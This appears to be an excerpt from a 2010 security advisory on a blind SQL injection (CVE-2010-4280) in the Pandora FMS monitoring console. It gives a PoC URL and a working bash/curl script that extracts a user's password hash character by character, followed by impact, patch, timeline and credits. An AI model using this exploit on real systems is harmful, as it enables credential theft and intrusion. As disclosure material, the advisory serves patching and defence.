[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software
solution for monitoring computer networks. It allows monitoring in a
visual way the status and performance of several parameters from
different operating systems, servers, applications and hardware systems
such as firewalls, proxies, databases, web servers or routers.
It can be deployed in almost any operating system. It features remote
monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use
agents. An agent is available for each platform. It can also monitor
hardware systems with a TCP/IP stack, such as load balancers, routers,
network switches, printers or firewalls.
This software has several servers that process and get information from
different sources, using WMI for gathering remote Windows information, a
predictive server, a plug-in server which makes complex user-defined
network tests, an advanced export server to replicate data between
different sites of Pandora FMS, a network discovery server, and an SNMP
Trap console.
Released under the terms of the GNU General Public License, Pandora FMS
is free software.
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The parameter group_id of operation/agentes/estado_agente.php is
vulnerable to blind sql injection.
PoC:
http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
Exploit:
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
#configure host,cookie&group_id before use it
#usage
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
w x y z)
GROUP_ID=2
j=1
while [[ $j -lt 33 ]]; do
i=0
while [[ $i -lt ${#CHARSET[ () ]} ]]; do
c=$(printf '%d' "'${CHARSET[$i]}")
URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";;
curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q
$PATTERN;
if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
let i++
done;
if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!";
exit 1; fi
let j++;
done
echo
exit 0
The fix to these kind of issues was the implementation of a generic
filter against sql injection. A proper fix is planned for a major version.
[+] Impact
An attacker can execute commands of the operating system, inject remote
code in the context of the application, get arbitrary files from the
filesystem or extract any data of the database including passwords and
confidential information about the monitored network/systems. Also it is
possible to bypass the authentication or scale privileges to became
admin, gaining full control of the web application and web server. These
vulnerabilities have a high impact to the confidentiality, integrity,
and availability of the system.
[+] Systems affected
Versions prior and including 3.1 of Pandora FMS are affected
[+] Solution
Apply the security fix for version 3.1:
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
Or upgrade to version 3.1.1 from
http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
[+] Timeline
Ago 2010: First contact to vendor
Ago 2010: Confirmation of vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released on October
Oct 2010: PandoraFMS security patch for 3.1 version released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory
[+] References
Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator:
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
[+] Credits
These vulnerabilities has been discovered by Juan Galiana Lara -
@jgaliana - http://juangaliana.blogspot.com/